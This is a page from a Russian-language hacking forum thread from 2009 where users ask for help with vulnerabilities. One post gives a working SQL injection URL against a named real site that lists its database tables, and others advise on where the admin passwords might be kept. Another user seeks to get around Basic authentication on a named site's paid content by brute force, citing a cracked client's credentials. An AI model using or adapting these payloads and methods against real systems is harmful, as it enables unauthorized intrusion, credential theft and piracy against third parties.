ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ_OLD > Уязвимости
Перезагрузить страницу Ваши вопросы по уязвимостям.
   
 
Страница 935 из 1393 « Первая < 435835885925 931 932 933 934 935 936 937 938 939 9459851035 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #9341  
Старый 12.10.2009, 00:31
wolmer
Постоянный
Регистрация: 12.05.2009
Сообщений: 395
Провел на форуме:
4761503

Репутация: 229
По умолчанию
Как боротся с такими каракулями чтобы был нормальный html ответ?

К примеру: http://img185.imageshack.us/img185/3456/20699052.jpg

Если же взять другой сендер то какой лучше брать для этого дела?
 

  #9342  
Старый 12.10.2009, 00:53
ElteRUS
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
Провел на форуме:
7215020

Репутация: 1423
По умолчанию
Цитата:
Сообщение от wolmer  
Как боротся с такими каракулями чтобы был нормальный html ответ?

К примеру: http://img185.imageshack.us/img185/3456/20699052.jpg

Если же взять другой сендер то какой лучше брать для этого дела?
Удали Accept-Encoding. Всю стороку нафиг с пакета
 

  #9343  
Старый 12.10.2009, 12:45
TELO
Познающий
Регистрация: 21.01.2009
Сообщений: 98
Провел на форуме:
227123

Репутация: 122
Отправить сообщение для TELO с помощью ICQ
По умолчанию
Скажите пожалуйста, а может быть такое что паролей на админку нет в базе?
Перерыл уже всё что можна, нашол только на юзеров.
Вот таблы:
Код:
http://www.berdyansk.su/view_news.php?id_news=-12573%20union%20select%201,2,3,4,5,group_concat%28table_name+separator+0x0a%29,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21%20FROM%20INFORMATION_SCHEMA.TABLES+where+table_schema=0x6265726479616e735f676f72706f7274616c%20--
 

  #9344  
Старый 12.10.2009, 13:10
DrAssault
Участник форума
Регистрация: 14.11.2008
Сообщений: 149
Провел на форуме:
950638

Репутация: 256
Отправить сообщение для DrAssault с помощью ICQ
По умолчанию
Цитата:
Сообщение от TELO  
Скажите пожалуйста, а может быть такое что паролей на админку нет в базе?
Перерыл уже всё что можна, нашол только на юзеров.
Вот таблы:
Код:
http://www.berdyansk.su/view_news.php?id_news=-12573%20union%20select%201,2,3,4,5,group_concat%28table_name+separator+0x0a%29,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21%20FROM%20INFORMATION_SCHEMA.TABLES+where+table_schema=0x6265726479616e735f676f72706f7274616c%20--
Конечно может
 

  #9345  
Старый 12.10.2009, 14:10
Krist_ALL
Banned
Регистрация: 14.01.2009
Сообщений: 515
Провел на форуме:
1996429

Репутация: 468


Отправить сообщение для Krist_ALL с помощью ICQ
По умолчанию
пароль может быть в файле или щашит в сам скрипт.
 

  #9346  
Старый 12.10.2009, 16:40
DrAssault
Участник форума
Регистрация: 14.11.2008
Сообщений: 149
Провел на форуме:
950638

Репутация: 256
Отправить сообщение для DrAssault с помощью ICQ
По умолчанию
Что самое интересное, я эту скулю крутил буквально, то ли вчера, то ли позавчера и там на админке была бэйсик авторизация, а сейчас нет чудеса ёпт
 

  #9347  
Старый 12.10.2009, 18:59
xa-xa89
Участник форума
Регистрация: 17.05.2008
Сообщений: 102
Провел на форуме:
1054394

Репутация: 74
Отправить сообщение для xa-xa89 с помощью ICQ
По умолчанию
А может вообще храниться в другой базе с другим юзером куда прав через попасть через эту скулю нет.Но это как вариант)
 

  #9348  
Старый 12.10.2009, 23:09
skyscr
Новичок
Регистрация: 02.06.2009
Сообщений: 3
Провел на форуме:
5378

Репутация: 0
Question
ребя подскажите инфу про сайтик:
http://lenagames.com/astra/jigsaws/

сайт вроде допотопный, вылазит форма авторизации, пробовал скачать сайт и полазить внутри, ничего интересного кроме java скриптов не нашёл, а папка jigsaws без авторизации никак.

В той папке лежат платные картинки для пазлов
Есть прога игра с пазлами, которая региться, а потом отсылает данные по вышеизложенному адресу, а в ответ мне приходит, что-то типа неправильный ключ,
нашёл и поставил ломанную прогу предыдущей версии этих пазлов и посмотрел как она лезет на сайт через Http Analyzer:
Цитата:
GET /astra/jigsaws/aertsen_p_peasants.exe HTTP/1.0
Host: www.lenagames.com
Accept: www/source, text/html, video/mpeg, image/jpeg, image/x-tiff
Accept: image/x-rgb, image/x-xbm, image/gif, */*, application/postscript
From: bj601_download
Content-type: application/x-www-form-urlencoded
"bj601_download" - как я понял это логин
пароль ломанный состоял из 24 символов (символы от A до F и от 0 до 9)

возможен ли метод перебора по моим параметрам или есть способы попроще?
Последний раз редактировалось skyscr; 12.10.2009 в 23:27..
 

  #9349  
Старый 12.10.2009, 23:16
mailbrush
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534

Репутация: 2731


Отправить сообщение для mailbrush с помощью ICQ
По умолчанию
Вот эта папка (в которой платные картинки) стоит по Basic-авторизацией.
 

  #9350  
Старый 12.10.2009, 23:42
skyscr
Новичок
Регистрация: 02.06.2009
Сообщений: 3
Провел на форуме:
5378

Репутация: 0
По умолчанию
предлагаете брутить?
 
 
Страница 935 из 1393 « Первая < 435835885925 931 932 933 934 935 936 937 938 939 9459851035 > Последняя »



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ